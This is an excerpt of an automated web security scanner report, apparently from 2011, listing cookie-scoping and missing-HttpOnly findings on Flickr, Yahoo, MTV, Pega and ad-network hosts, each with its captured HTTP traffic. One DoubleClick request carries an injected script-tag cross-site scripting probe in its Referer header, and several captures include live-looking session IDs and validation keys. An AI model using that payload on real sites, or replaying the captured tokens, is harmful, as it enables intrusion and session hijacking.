The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fragment.gne?name=inc_language_selector HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.flickr.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:23:13 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 13-Jun-2014 00:23:13 GMT; path=/; domain=.flickr.com
X-Served-By: www116.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Via: HTTP/1.1 r21.ycpi.ne1.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r22.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 1481

       <ul>
           <li><a href="/change_language.gne?lang=zh-hk&magic_cookie=627772737f8cc7615c9c893fe0d08b9d" class="image_link" id="lang_zh-hk"><img src="http://l.yimg.com/g/images/spaceout.gif" width="45" h
...[SNIP]...
11.46. http://www.flickr.com/report_abuse.gne  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /report_abuse.gne

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /report_abuse.gne HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.flickr.com/about/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n; fl_v=souhp; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:23:44 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 13-Jun-2014 00:23:44 GMT; path=/; domain=.flickr.com
X-Served-By: www23.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Via: HTTP/1.1 r20.ycpi.ne1.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r13.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 53534

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>

   <title>Flickr: Report Abuse</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   
...[SNIP]...
11.47. http://www.flickr.com/signin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /signin

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signin?popup=1&redir=/photo_grease_postlogin.gne?d=http://www.flickr.com/report_abuse.gne HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.flickr.com/report_abuse.gne
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n; fl_v=souhp; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 302 Found
Date: Tue, 14 Jun 2011 00:23:49 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 13-Jun-2014 00:23:49 GMT; path=/; domain=.flickr.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 14 Jun 2011 00:23:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, private
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
location: https://login.yahoo.com/config/login?.src=flickrsignin&.pc=8190&.scrumb=0&.pd=c%3DJvVF95K62e6PzdPu7MBv2V8-&.intl=us&.done=https%3A%2F%2Flogin.yahoo.com%2Fconfig%2Fvalidate%3F.src%3Dflickrsignin%26.pc%3D8190%26.scrumb%3D0%26.pd%3Dc%253DJvVF95K62e6PzdPu7MBv2V8-%26.intl%3Dus%26.done%3Dhttp%253A%252F%252Fwww.flickr.com%252Fsignin%252Fyahoo%252F%253Fredir%253D%25252Fphoto_grease_postlogin.gne%25253Fd%25253Dhttp%25253A%25252F%25252Fwww.flickr.com%25252Freport_abuse.gne
X-Served-By: www142.flickr.mud.yahoo.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 0
Via: HTTP/1.1 r25.ycpi.mud.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r17.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 0

11.48. http://www.pega.com/user  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pega.com
Path:   /user

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /user HTTP/1.1
Host: www.pega.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94242332.1308054477.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94242332.1196155334.1308054477.1308054477.1308054477.1; __utmc=94242332; __utmv=94242332.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=94242332.6.10.1308054477

Response

HTTP/1.1 302 Found
Server: nginx
Content-Type: text/html; charset=utf-8
Set-Cookie: DestinationURL=http%3A%2F%2Fwww.pega.com%2Fuser; path=/; domain=.pega.com; httponly
Set-Cookie: RedirectFunction=login; path=/; domain=.pega.com; httponly
Location: http://members.pega.com/login.asp
X-AH-Environment: prod
Vary: Accept-Encoding
Content-Length: 0
Date: Tue, 14 Jun 2011 12:30:03 GMT
X-Varnish: 238947927
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

12. Cookie without HttpOnly flag set  previous  next
There are 60 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

12.1. http://a.analytics.yahoo.com/fpc.pl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://a.analytics.yahoo.com
Path:   /fpc.pl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fpc.pl?a=10001494318262&v=5.17&enc=UTF-8&b=Downloads%20%7C%20Yahoo!%20Advertising%20Blog&f=http%3A%2F%2Fwww.yadvertisingblog.com%2Fblog%2Fdownloads%2F&e=http%3A%2F%2Fwww.yadvertisingblog.com%2Fblog%2F2011%2F05%2F31%2Fyahoo-launches-clear-ad-notice%2F&flv=Shockwave%20Flash%2010.3%20r181&d=Tue%2C%2014%20Jun%202011%2000%3A26%3A38%20GMT&n=5&g=en-US&h=Y&j=1920x1200&k=32&l=true&ittidx=0&fpc=v-Z-Or9d%7CqwoUoZiLaa%7Cfses10001494318262%3D%7CqwoUoZiLaa%7Cv-Z-Or9d%7Cfvis10001494318262%3DZT1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmY9aHR0cCUzQSUyRiUyRnd3dy55YWR2ZXJ0aXNpbmdibG9nLmNvbSUyRmJsb2clMkYyMDExJTJGMDUlMkYzMSUyRnlhaG9vLWxhdW5jaGVzLWNsZWFyLWFkLW5vdGljZSUyRiZiPVlhaG9vISUyMExhdW5jaGVzJTIwQ0xFQVIlMjBBZCUyME5vdGljZSUyMCU3QyUyMFlhaG9vISUyMEFkdmVydGlzaW5nJTIwQmxvZw%3D%3D%7C8MYoY8Yos7%7C8MYoY8Yos7%7C8MYoY8Yos7%7C8%7C8MYoY8Yos7%7C8MYoY8Yos7 HTTP/1.1
Host: a.analytics.yahoo.com
Proxy-Connection: keep-alive
Referer: http://www.yadvertisingblog.com/blog/downloads/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; itvisitorid10001494318262=qwoUoZiLaa|v-Z-Or9d|fvis10001494318262=ZT1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmY9aHR0cCUzQSUyRiUyRnd3dy55YWR2ZXJ0aXNpbmdibG9nLmNvbSUyRmJsb2clMkYyMDExJTJGMDUlMkYzMSUyRnlhaG9vLWxhdW5jaGVzLWNsZWFyLWFkLW5vdGljZSUyRiZiPVlhaG9vISUyMExhdW5jaGVzJTIwQ0xFQVIlMjBBZCUyME5vdGljZSUyMCU3QyUyMFlhaG9vISUyMEFkdmVydGlzaW5nJTIwQmxvZw==|8MYoY8Yos7|8MYoY8Yos7|8MYoY8Yos7|8|8MYoY8Yos7|8MYoY8Yos7; itsessionid10001494318262=qwoUoZiLaa|fses10001494318262=; itvisitorid1000380893662=eekMoZiLaa|R_XJW0dg|fvis1000380893662=Zj1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmI9SG9tZSUyMHBhZ2U=|M|M|M|s|8MYoY8YoMM|M; itsessionid1000380893662=eekMoZiLaa|fses1000380893662=; ALP=bTowJmw6ZW5fVVMm

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:27:35 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: itvisitorid10001494318262=qwoUoZiLaa|v-Z-Or9d|fvis10001494318262=ZT1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmY9aHR0cCUzQSUyRiUyRnd3dy55YWR2ZXJ0aXNpbmdibG9nLmNvbSUyRmJsb2clMkYyMDExJTJGMDUlMkYzMSUyRnlhaG9vLWxhdW5jaGVzLWNsZWFyLWFkLW5vdGljZSUyRiZiPVlhaG9vISUyMExhdW5jaGVzJTIwQ0xFQVIlMjBBZCUyME5vdGljZSUyMCU3QyUyMFlhaG9vISUyMEFkdmVydGlzaW5nJTIwQmxvZw==|7|7|7|8|8MYoY88s11|7; path=/; domain=.analytics.yahoo.com
Set-Cookie: itsessionid10001494318262=qwoUoZiLaa|fses10001494318262=; path=/; domain=.analytics.yahoo.com
TS: 0 261 dc3_ac4
Pragma: no-cache
Expires: Tue, 14 Jun 2011 00:27:36 GMT
Cache-Control: no-cache, private, must-revalidate
Content-Length: 45
Accept-Ranges: bytes
Tracking-Status: fpc site tracked
Connection: close
Content-Type: application/x-javascript

// First Party Cookies
// TS: 0 261 dc3_ac4

12.2. http://a.analytics.yahoo.com/p.pl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://a.analytics.yahoo.com
Path:   /p.pl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /p.pl?a=1000380893662&v=5.17&enc=UTF-8&b=Home%20page&c=yahoo!%20advertising%20solutions&f=http%3A%2F%2Fadvertising.yahoo.com%2F&x=7&cf20=EXIT&cf21=click%20Sponsored%20Search&ca=1&ix=2&ittidx=0&fpc= HTTP/1.1
Host: a.analytics.yahoo.com
Proxy-Connection: keep-alive
Referer: http://advertising.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; itvisitorid1000380893662=eekMoZiLaa|R_XJW0dg|fvis1000380893662=Zj1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmI9SG9tZSUyMHBhZ2U=|8MYoY8YosM|8MYoY8YosM|8MYoY8YosM|8|8MYoY8YosM|8MYoY8YosM; itsessionid1000380893662=eekMoZiLaa|fses1000380893662=; itvisitorid10001494318262=qwoUoZiLaa|v-Z-Or9d|fvis10001494318262=ZT1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmY9aHR0cCUzQSUyRiUyRnd3dy55YWR2ZXJ0aXNpbmdibG9nLmNvbSUyRmJsb2clMkYyMDExJTJGMDUlMkYzMSUyRnlhaG9vLWxhdW5jaGVzLWNsZWFyLWFkLW5vdGljZSUyRiZiPVlhaG9vISUyMExhdW5jaGVzJTIwQ0xFQVIlMjBBZCUyME5vdGljZSUyMCU3QyUyMFlhaG9vISUyMEFkdmVydGlzaW5nJTIwQmxvZw==|8MYoY8Yos7|8MYoY8Yos7|8MYoY8Yos7|8|8MYoY8Yos7|8MYoY8Yos7; itsessionid10001494318262=qwoUoZiLaa|fses10001494318262=

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:20:33 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: itvisitorid1000380893662=eekMoZiLaa|R_XJW0dg|fvis1000380893662=Zj1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmI9SG9tZSUyMHBhZ2U=|M|M|M|s|8MYoY8YoMM|M; path=/; domain=.analytics.yahoo.com
Set-Cookie: itsessionid1000380893662=eekMoZiLaa|fses1000380893662=; path=/; domain=.analytics.yahoo.com
TS: 0 272 dc12_ac4
Connection: close
Pragma: no-cache
Expires: Tue, 14 Jun 2011 00:20:34 GMT
Cache-Control: no-cache, private, must-revalidate
Accept-Ranges: bytes
Tracking-Status: site tracked
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;
12.3. http://gs.mtv.com/games/playgame.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://gs.mtv.com
Path:   /games/playgame.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /games/playgame.php?site_id=1&game_id=1390 HTTP/1.1
Host: gs.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_ppv=62; s_cc=true; s_sq=%5B%5BB%5D%5D; mbox=session#1308010496673-477284#1308012624|check#true#1308010824; __cs_rr=1; adPlayCounter=0

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.8
Content-Type: text/html
Content-Length: 1190
Date: Tue, 14 Jun 2011 00:19:41 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gs_session=user_id%3D0%26day_stamp%3D15139%26site_id%3D1%26session_id%3D0ba59ab39da532eff77d95c0fb336a2b%26user_name%3D%26validation_key%3Dcbe73a9137cb8591ae079f1a2b3cc064; path=/; domain=mtv.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
12.4. http://imx.mtv.com/sitewide/droplets/view_gen.jhtml  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://imx.mtv.com
Path:   /sitewide/droplets/view_gen.jhtml

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sitewide/droplets/view_gen.jhtml?itemUrl=cms_item%3A%2F%2Fwww.mtv.com%2F10325912&tagParams=tag_action%3Dviewed%26 HTTP/1.1
Host: imx.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_ppv=62; mbox=session#1308010496673-477284#1308012624|check#true#1308010824; __cs_rr=1; adPlayCounter=1; gs_session=user_id%3D0%26day_stamp%3D15139%26site_id%3D1%26session_id%3D0ba59ab39da532eff77d95c0fb336a2b%26user_name%3D%26validation_key%3Dcbe73a9137cb8591ae079f1a2b3cc064; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Length: 0
Content-Type: text/html
Set-Cookie: app-instance=mtv-com-1-mtv-jboss-030; Path=/
Set-Cookie: MTV_ID=209.18.38.157.1308010817621; Domain=.mtv.com; Expires=Fri, 11-Jun-2021 00:20:17 GMT; Path=/
Set-Cookie: JSESSIONID=D48ED7EDF023D65652E97D5F0EF7CFA9.mtv-jboss-029-811-mtvi-com-34851; Path=/
MTVi-Edge-control: bust-downstream
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:20:17 GMT
Connection: close
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Tue, 04 Dec 1993 21:29:03 GMT

12.5. https://marketingsolutions.login.yahoo.com/adui/signin/displaySignin.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://marketingsolutions.login.yahoo.com
Path:   /adui/signin/displaySignin.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adui/signin/displaySignin.do HTTP/1.1
Host: marketingsolutions.login.yahoo.com
Connection: keep-alive
Referer: http://advertising.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:21:45 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: JSESSIONID=C08D800A7F9FFF726A8F260F8117457E.; Path=/adui; Secure
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0, private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ALP=bTowJmw6ZW5fVVMm; Domain=.yahoo.com; Expires=Wed, 13-Jun-2012 06:10:31 GMT; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 34149

<html lang="en"><head>
<script type="text/javascript">
if (top != self) top.location.href = location.href;

document.domain = "login.yahoo.com";
</script>

<title>
Sponsored Search Lo
...[SNIP]...
12.6. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=alexacom&adSpace=us&tagKey=2057624979&th=24047165603&tKey=undefined&size=160x600&flashVer=10&ver=1.20&center=1&noAd=1&url=http%3A%2F%2Fwww.alexa.com%2F&f=1&p=11240442&a=1&rnd=11248586 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1219;c=15/1;w=160;h=600;d=7;s=1;q=ALEXA_core
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=atnfruriItm63PT3eCiVPFU9J3JngpSjAbVAFjAQ74dPYSjsRwrHYvtnr4KeUB2FN0mFZam1Q4Zb5rCJ9tK3lqAbkvlpOS1Rdt7DmDyL6OUtkALmYL4Wavq3MgWc1HeOgorXrJaK5sPy8H3fG6rR2QZb73RfYD7XNfUw2v862OqaRixZb5S92TBo0ZboG8xCyE6ccrY1vMr0lZcJ7HEQqUTs7ZcGWgDTZaBv8fwLdEfO2cZa8blJZaeDCHYK1lVZc5p4aZdjZbgKkBDVSbYfiUeYvpSwrMTOZbs9Wowek8qxQSRDXPB1fo6POyHSk8EZcVlcW544LyeJJRyc7ZcwlPqgZcKVBvq5DYG37tj6JHGQIxn0qQfwbekxTZdBnNq3VQPGVtTDRPQbxuhmTir4T31S7RWZbZdB6DKqCZdjLm33R3r6FushuEK4WJu9ZdYGR2HKcGU8us7udWbaEpQSIXx2NZa

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=aungjUwl6hwUQQwgQRaCFyUS7jC64OywUPxH2ILm35hSvP9FsxMpesmpvZcKIfCWWhrWEmo3P82WbGmlrZcx7bYZcZagpWnmhairy6ma7rJZb2NA6HsUJcwdNZbaPZbs2Nb2PgQrirwuO5T3mBsjwZc6n329ruwdYsDmIQ7to3tB6ZbwdyuKZdUaV6IeZa6gVVsdAjgeoEB700gMh3ZdOtZd67b0AmhcNCddDXtZaYcwYZd1e7Zb2dZdRfvDfUlFtQ823R25PKTHZabPZax2JX8F6clMqSZaORTCEDtY90WCRXbpAtNEHsrWXN8S2QpOdP6Q6Zd41WXX2R1yIrKYkpZcfxSRoho14QMZbSB36SmkGC0185hLHQsZaKwCrPRcGI54u10SehUmjwOtm54055TZdrgTkHc7m0BimPPCqGAjO55gdM06TeYZbsbZap6n1ZcNJAwGBYIhgR8oWONy4mlQZbZdoO3NBHYYQHoFrMrMTb6CZcw; path=/; domain=.tribalfusion.com; expires=Mon, 12-Sep-2011 00:28:25 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 386
Expires: 0
Connection: keep-alive

document.write('<center><a target=_blank href="http://a.tribalfusion.com/h.click/armMfj4sQUYbQKTmPm4mZb7RP7J3dnnXWrZamdIv36YT3GMdTsJ9WVJ7P6FvWdY3WFj43ritVqUtTTQ8SaQISGQIRr6vRW7aVGfQ2FPomHqs0amM4dMBPsb
...[SNIP]...
12.7. http://ad.doubleclick.net/clk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clk;241002212;63651464;o?http://us.havaianas.com/MYOH.html HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
Cookie: id=c60bd0733000097|3226301/1106615/15127,3149839/1069411/15111,2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye; rsi_segs=E11178_10001

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://us.havaianas.com/MYOH.html
